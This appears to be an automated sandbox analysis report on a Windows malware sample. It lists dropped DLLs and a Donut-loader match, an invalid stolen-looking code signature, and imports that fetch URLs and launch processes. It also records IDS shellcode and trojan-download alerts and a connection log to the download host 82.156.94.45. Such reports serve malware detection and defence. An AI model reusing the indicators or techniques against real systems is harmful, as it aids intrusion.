                                                                SSDEEP:12288:aZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e1:a/8wVwHZFTwFOOos3Ooc8DHkC2e1
                                                                MD5:3B239C13A3F3A771C87869B860306C93
                                                                SHA1:75FCCDB1F863DED4D412A1D3ACB86C3E97CD24BB
                                                                SHA-256:C911EB71A45A88A6AF0800BC26CF8D10C4F5357D8D2499F6F288A2390DF26FBC
                                                                SHA-512:DDAC80C8AB28A4E9D00349740B07A40A8AD1C53A52970DEC29B9271ABA2A04B10E2919757FB128A752ACB643ED107756E0FD4825D6D90E2147A65EEE2F8DD167
                                                                Malicious:false
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0......................................5.....@..........................W..L...<...<........................=.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):970744
                                                                Entropy (8bit):6.964896388792595
                                                                Encrypted:false
                                                                SSDEEP:12288:6BmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJSH:SmFyjLF847eiWWcoGZVOIxh/WxIAIbu
                                                                MD5:50097EC217CE0EBB9B4CAA09CD2CD73A
                                                                SHA1:8CD3018C4170072464FBCD7CBA563DF1FC2B884C
                                                                SHA-256:2A2FF2C61977079205C503E0BCFB96BF7AA4D5C9A0D1B1B62D3A49A9AA988112
                                                                SHA-512:AC2D02E9BFC2BE4C3CB1C2FFF41A2DAFCB7CE1123998BBF3EB5B4DC6410C308F506451DE9564F7F28EB684D8119FB6AFE459AB87237DF7956F4256892BBAB058
                                                                Malicious:false
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D.....................................................@.........................`........R..(....p...................=......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):219584
                                                                Entropy (8bit):6.1663383385555814
                                                                Encrypted:false
                                                                SSDEEP:3072:0Kip9MQPBN+xPYpaEjlFORHc+hmTb2vNESkT6rQxCqCp4fCw4mCD4pbu:0D5N+6fjlURHcTbMNSTbxupfwADL
                                                                MD5:E864FE41A4FEDEC386A65CB456CA3066
                                                                SHA1:3BEE65E903573E7CDB0592F3519F98BDCDE493C3
                                                                SHA-256:06871B2A233E56C57741FD40EC1D298D306C60FCBF5236832C4CE98FF34D8DCA
                                                                SHA-512:4E8C0EB8F2642BA210C53C5CF4379D2F89A1130B148C934B79ACD32B2B77257A18C24173AEF36877C64C46E709EB4A622CF69A352DCEBE97ACCB432F5D886317
                                                                Malicious:false
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........L...L...L...E...F....$..\....$..F....$..N....$..H......I...L...*....'..M....'..M....'b.M....'..M...RichL...........PE..L...>..e...........!...'............3........................................p............@.........................P.......l........................0...).......a.....................................@............................................text............................... ..`.rdata...2.......4..................@..@.data...............................@....rsrc...............................@..@.reloc...a.......b..................@..B................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446840
                                                                Entropy (8bit):6.690279428020546
                                                                Encrypted:false
                                                                SSDEEP:12288:5mtyWf0sTWRzbpT/tD5YpsGx30h7whUgiW6QR7t5s03Ooc8dHkC2es98R:A0HsTWRzbp5D5YpsM3A7v03Ooc8dHkCh
                                                                MD5:C766CA0482DFE588576074B9ED467E38
                                                                SHA1:5AC975CCCE81399218AB0DD27A3EFFC5B702005E
                                                                SHA-256:85AA8C8AB4CBF1FF9AE5C7BDE1BF6DA2E18A570E36E2D870B88536B8658C5BA8
                                                                SHA-512:EE36BC949D627B06F11725117D568F9CF1A4D345A939D9B4C46040E96C84159FA741637EF3D73ED2D01DF988DE59A573C3574308731402EB52BAE2329D7BDDAC
                                                                Malicious:false
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.$...w...w...w.\.v...w.V@w...w..v...w...w...w..v...w..v...w..vD..w..v...w.,w...w..v...wRich...w........................PE..L....4.w.........."!...&.....z...............0.......................................=....@A.........................S......8c..........................xO.......4...U..T...........................8U..@............`..0............................text...b........................... ..`.data....&...0......................@....idata..0....`.......0..............@..@.rsrc................H..............@..@.reloc...4.......6...L..............@..B........................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):40917
                                                                Entropy (8bit):7.28053200206121
                                                                Encrypted:false
                                                                SSDEEP:768:3SR/d8civCTlNQHE64vMXuyMcS7iKGztVuanh8w2OfJ7ejaP6yEqzeGO0gf:Q/dSCoHE6wE7McS7i9u6yeNejY6yFOB
                                                                MD5:8AA72F47438EEBD6FE0E8C94BD206CA8
                                                                SHA1:6B9AD499F5C9E71294E3086A8C6E56F3B5C4590F
                                                                SHA-256:E45B9DFCCD0EEE7F4D676E2AAA74D8FE0238A3B37E2B21A9182C283B70D6A2FD
                                                                SHA-512:A5315D541B118D72997204FA983EBB0046F8B8D09EABEDFC1C1BCC55200B5191611697F2B9BE9B065656FDBC7BE6CE2BC0328BD03BDCD45A7A11384D1B199400
                                                                Malicious:false
                                                                Yara Hits:
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\qd[1].bin, Author: unknown
                                                                Preview:..=...=..`9j.k...5pD?.Q....".f 7.h.........}]'..4.NV.h3.t>.Qro.......B.'".i...x.8..RX.K7...f.m4...+.9W!.F.....6...f..l6...Q.fQ..=.F%y..=..H..c.}..x}.....:.E"."....h........~(.k...>B..ns.D.......C.....q...>+CQ0....V.s.....u.}..&I.*8_.!.>..=(.;.....S.*........U....._SO...||_..I..X..R..bD...[..Sz.7...F..u_.....Q.....@...(.-G......}...E...m.l....EL.....)WI.....I/=u3N^WY...#.YH...\j.5{.s.9z7=A..A.Y;...5Yq,.ND\#.M..L....j...O..@-z..n..b._.........u.....ns.KL.h<._..x...D.,....6....}..P.5.-u.u&B#.. .G.|_....]T....}......g....Xl<.J...R~|.m......................N.z..x.+.-}.[;...L;.....].2..*.....4..0...(../.b.C...M=....b{t7........Wp..E...J.~.K...8....g.:[]..{4......V.F.....*y^...M.SI.....i..w..4.<*.Z..$:t8.DJj.+........P.*...w.^@#....X.P.*....H...]...~I.5F...=dA....~kU.Y.X.V+.......m*.)7*.......]i...G.f....=...`......=........R.x.-`.Mbe...M..J..#..Y......Q../H....5...!`.....p?b.... B..../|...fL..q.....V.t....u..P...{...;.&u.p.;..._..1.......T..ru..U.
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):91104
                                                                Entropy (8bit):6.919609919273454
                                                                Encrypted:false
                                                                SSDEEP:1536:wd5wd+ywOpmlhcsrG4ckZEzH3qDLItnTwfVkC2KecbGJ13yd+zTNFZFzK:wdJywOpmlPrHI6D+nTwvlecbG/3y8XG
                                                                MD5:9C133B18FA9ED96E1AEB2DA66E4A4F2B
                                                                SHA1:238D34DBD80501B580587E330D4405505D5E80F2
                                                                SHA-256:C7D9DFDDBE68CF7C6F0B595690E31A26DF4780F465D2B90B5F400F2D8D788512
                                                                SHA-512:D2D588F9940E7E623022ADEBEBDC5AF68421A8C1024177189D11DF45481D7BFED16400958E67454C84BA97F0020DA559A8DAE2EC41950DC07E629B0FD4752E2F
                                                                Malicious:false
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................2........I..............o.......o.......o.......o.......o%......o......Rich............PE..L....s............"!...&............P........................................P...........@A........................@........ .......0...................O...@.......$..T............................#..@............ ...............................text...T........................... ..`.data...d...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):349
                                                                Entropy (8bit):2.4642354644001863
                                                                Encrypted:false
                                                                SSDEEP:3:OxA6x/MF+AtnoUa/Z/aEjCCNFqP1SXsIISXSII/6JFFTCQor/rZ:Od/4+ARo7/hX0qIGICLhojF
                                                                MD5:FE8FE166EC4836ACD97EEF02211F6612
                                                                SHA1:D967948AC32F993C2C8F877F1E455ABEE2CE08A0
                                                                SHA-256:FCA89EB419B97B702109F2863667306FE085BAB9F31F2D4B77E48A26CACC4E9F
                                                                SHA-512:2A76B10D66D6227B68320AC57432D15A82FEC89520AF7FDE60C458F745880777007008A7538539F790005AE2970CBF381A8CCEAE93E602E4C73DEDAD48ADF872
                                                                Malicious:false
                                                                Preview:Not Windows 7. Continuing with the rest of the code.......TaskPath TaskName State ..-------- -------- ----- ..\ OnLogon Ready ..........ok..
                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                Entropy (8bit):6.497862673770642
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:LisectAVT_2403002B_185.exe
                                                                File size:328'552 bytes
                                                                MD5:0aafd40537a281b281bd85efcb2c976b
                                                                SHA1:d9b7aa59133586c9f885899b0483117500460036
                                                                SHA256:89daf7a9b800a5d38cf93accc70b5f24568aa65353e2c1b44199159a8cf888fb
                                                                SHA512:91ff154a67a4462982581e1191f91d0ac10a47b93d339f7f152bb8f97a7eec3f84e97b9a46484fa1165ffa9f9f12200ca11fb4cc814d4ad5743618a15e37ce85
                                                                SSDEEP:6144:zqgHVf5iIZrJCt6nn01HZLj0DubeeBKjMvtwAOMX2HgzxdQacEdY:zpVBX9JCtJB9w5acH
                                                                TLSH:45645B0175418432E7660B3149E9EAF9492DAD740B94A8DFE3E83E7E4E712D36A3311F
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N..^............A.......A.......A.......X.......X.......X...F...A...........f.....................|.............Rich...........
                                                                Icon Hash:00928e8e8686b000
                                                                Entrypoint:0x409ffb
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows cui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x65FC8D9A [Thu Mar 21 19:42:18 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:6
                                                                OS Version Minor:0
                                                                File Version Major:6
                                                                File Version Minor:0
                                                                Subsystem Version Major:6
                                                                Subsystem Version Minor:0
                                                                Import Hash:0551946c53eef862268f699870a0319b
                                                                Signature Valid:false
                                                                Signature Issuer:CN=GlobalSign CodeSigning CA - G3, O=GlobalSign nv-sa, C=BE
                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                Error Number:-2146869232
                                                                Not Before, Not After
                                                                • 18/02/2020 22:11:49 18/02/2023 04:42:26
                                                                Subject Chain
                                                                • CN="BEIJING KUWO TECHNOLOGY CO.,LTD.", O="BEIJING KUWO TECHNOLOGY CO.,LTD.", L=Beijing, S=Beijing, C=CN
                                                                Version:3
                                                                Thumbprint MD5:A8E70CC9BA3E5602D7C4F6BC5A516542
                                                                Thumbprint SHA-1:B4BC05741C5F8EF6AC8863D2A737B5444DB63ED8
                                                                Thumbprint SHA-256:9214C7372F243EC5071BA66562243A8845CB3FD2F647BF39B81BD7BB419DB915
                                                                Serial:60CEB993776A1B86387AE3F0
                                                                Instruction
                                                                call 00007F070CE0BFD9h
                                                                jmp 00007F070CE0B9F9h
                                                                push ebp
                                                                mov ebp, esp
                                                                mov eax, dword ptr [ebp+08h]
                                                                push esi
                                                                mov ecx, dword ptr [eax+3Ch]
                                                                add ecx, eax
                                                                movzx eax, word ptr [ecx+14h]
                                                                lea edx, dword ptr [ecx+18h]
                                                                add edx, eax
                                                                movzx eax, word ptr [ecx+06h]
                                                                imul esi, eax, 28h
                                                                add esi, edx
                                                                cmp edx, esi
                                                                je 00007F070CE0BB9Bh
                                                                mov ecx, dword ptr [ebp+0Ch]
                                                                cmp ecx, dword ptr [edx+0Ch]
                                                                jc 00007F070CE0BB8Ch
                                                                mov eax, dword ptr [edx+08h]
                                                                add eax, dword ptr [edx+0Ch]
                                                                cmp ecx, eax
                                                                jc 00007F070CE0BB8Eh
                                                                add edx, 28h
                                                                cmp edx, esi
                                                                jne 00007F070CE0BB6Ch
                                                                xor eax, eax
                                                                pop esi
                                                                pop ebp
                                                                ret
                                                                mov eax, edx
                                                                jmp 00007F070CE0BB7Bh
                                                                push esi
                                                                call 00007F070CE0C48Ch
                                                                test eax, eax
                                                                je 00007F070CE0BBA2h
                                                                mov eax, dword ptr fs:[00000018h]
                                                                mov esi, 00439230h
                                                                mov edx, dword ptr [eax+04h]
                                                                jmp 00007F070CE0BB86h
                                                                cmp edx, eax
                                                                je 00007F070CE0BB92h
                                                                xor eax, eax
                                                                mov ecx, edx
                                                                lock cmpxchg dword ptr [esi], ecx
                                                                test eax, eax
                                                                jne 00007F070CE0BB72h
                                                                xor al, al
                                                                pop esi
                                                                ret
                                                                mov al, 01h
                                                                pop esi
                                                                ret
                                                                push ebp
                                                                mov ebp, esp
                                                                cmp dword ptr [ebp+08h], 00000000h
                                                                jne 00007F070CE0BB89h
                                                                mov byte ptr [00439234h], 00000001h
                                                                call 00007F070CE0C27Ah
                                                                call 00007F070CE0E49Eh
                                                                test al, al
                                                                jne 00007F070CE0BB86h
                                                                xor al, al
                                                                pop ebp
                                                                ret
                                                                call 00007F070CE17115h
                                                                test al, al
                                                                jne 00007F070CE0BB8Ch
                                                                push 00000000h
                                                                call 00007F070CE0E4A5h
                                                                pop ecx
                                                                jmp 00007F070CE0BB6Bh
                                                                mov al, 01h
                                                                pop ebp
                                                                ret
                                                                push ebp
                                                                mov ebp, esp
                                                                cmp byte ptr [00439235h], 00000000h
                                                                je 00007F070CE0BB86h
                                                                mov al, 01h
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x36fa00x64.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3a0000x139c0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x4d2000x3168
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x4e0000x1d78.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x34b1c0x38.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x34b580x40.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x290000x190.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x27b480x27c00f9369b3de80dc2c86a013e9c45987826False0.5549270341981132data6.5674932450931145IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x290000xe8b60xea00d8cb14d23420e608b6e529be084f5c2fFalse0.5098490918803419OpenPGP Secret Key Version 35.550865699729164IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x380000x1d6c0x10007189b1f5fdb48443940180984db65284False0.1962890625DOS executable (block device driver)3.171188272220345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x3a0000x139c00x13a0061637e6f774bdd5046dba2a5bfd1ffc0False0.28734574044585987data5.572749455643106IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x4e0000x1d780x1e0034c18553d7f180cce18f79b006cd2e7bFalse0.7430989583333333data6.4748070259396195IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                EXE0x3a0f00x13368PE32 executable (GUI) Intel 80386, for MS WindowsChineseChina0.28584680288705905
                                                                RT_VERSION0x4d4580x3e0dataChineseChina0.4586693548387097
                                                                RT_MANIFEST0x4d8380x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                DLLImport
                                                                KERNEL32.dllSetPriorityClass, VirtualFree, GetCurrentProcess, VirtualAlloc, SetThreadPriority, Sleep, GetCurrentThread, GetVersionExA, ExitProcess, GetConsoleWindow, CreateDirectoryA, WriteConsoleW, HeapSize, CreateFileW, GetProcessHeap, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, GetCPInfo, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, TerminateProcess, RtlUnwind, RaiseException, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetCommandLineA, GetCommandLineW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, GetFileSizeEx, SetFilePointerEx, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, CloseHandle, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetFileAttributesExW, HeapAlloc, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, SetEndOfFile
                                                                USER32.dllShowWindow
                                                                SHELL32.dllSHChangeNotify, ShellExecuteA
                                                                WININET.dllInternetCloseHandle, InternetOpenA, InternetReadFile, InternetOpenUrlA
                                                                Language of compilation systemCountry where language is spokenMap
                                                                ChineseChina
                                                                EnglishUnited States
                                                                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                2024-07-25T17:03:08.460592+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected4434971082.156.94.45192.168.2.7
                                                                2024-07-25T17:03:37.607618+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435580840.127.169.103192.168.2.7
                                                                2024-07-25T17:03:03.085315+0200TCP2018581ET MALWARE Single char EXE direct download likely trojan (multiple families)49709443192.168.2.782.156.94.45
                                                                2024-07-25T17:03:39.276673+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435580940.127.169.103192.168.2.7
                                                                2024-07-25T17:03:14.151724+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971240.127.169.103192.168.2.7
                                                                2024-07-25T17:03:11.570913+0200TCP2100648GPL SHELLCODE x86 NOOP4434971082.156.94.45192.168.2.7
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jul 25, 2024 17:02:59.686099052 CEST49709443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:02:59.686142921 CEST4434970982.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:02:59.686319113 CEST49709443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:02:59.695772886 CEST49709443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:02:59.695791960 CEST4434970982.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:01.503787041 CEST4434970982.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:01.503891945 CEST49709443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:01.504872084 CEST4434970982.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:01.504952908 CEST49709443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:01.566915989 CEST49709443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:01.566943884 CEST4434970982.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:01.567287922 CEST4434970982.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:01.567349911 CEST49709443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:01.571660995 CEST49709443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:01.612497091 CEST4434970982.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:03.085345984 CEST4434970982.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:03.085418940 CEST4434970982.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:03.085417032 CEST49709443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:03.085475922 CEST49709443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:03.217452049 CEST49709443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:03.217487097 CEST4434970982.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:03.554783106 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:03.554836035 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:03.554909945 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:03.555725098 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:03.555742979 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:05.801989079 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:05.802227974 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:05.803145885 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:05.803158998 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:05.803416967 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:05.803421974 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:06.304294109 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:06.304327965 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:06.304441929 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:06.304472923 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:06.304510117 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:06.304569006 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:06.634965897 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:06.634984970 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:06.635103941 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:06.635143995 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:06.635200977 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:06.638806105 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:06.638902903 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:06.638937950 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:06.638988018 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:06.917422056 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:06.917438984 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:06.917556047 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:06.917588949 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:06.917639017 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:06.920877934 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:06.920963049 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:06.920985937 CEST4434971082.156.94.45192.168.2.7
                                                                Jul 25, 2024 17:03:06.921036005 CEST49710443192.168.2.782.156.94.45
                                                                Jul 25, 2024 17:03:07.222929001 CEST4434971082.156.94.45192.168.2.7
